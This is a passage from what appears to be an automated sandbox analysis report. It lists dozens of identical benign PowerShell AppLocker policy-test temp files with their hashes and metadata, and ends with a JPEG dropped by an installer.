Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvlacoak.cls.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxixd2vt.wng.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3sr4eb1.n1a.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbgbn2z1.40e.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nf0tk5he.web.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfdgcaps.t3q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngutjan0.jst.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oilsmvx5.3th.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olg0myf5.rkz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omfinqpf.cql.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osgjuqzi.cjw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovvxfxil.qlw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyitnx13.v4k.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q05d0cmk.lif.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkazks23.za5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtn333rs.mzu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quhcuuto.ifs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbebgliv.uoy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfgn0fya.eoc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfngclyq.m55.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgxeufmz.l3z.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ry5ytz2p.vsa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usa10130.tv2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuouejy0.v2f.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl4kgb15.gw4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu3quzsq.tbg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlc3n1lu.z4p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wu4syahw.0as.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x42jote0.qow.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y54woezd.i0m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydtvrxxi.k2h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhzqnrqz.rnv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2foqgdk.qai.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 497x63, components 3
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	7.670995643119166
Encrypted:	false
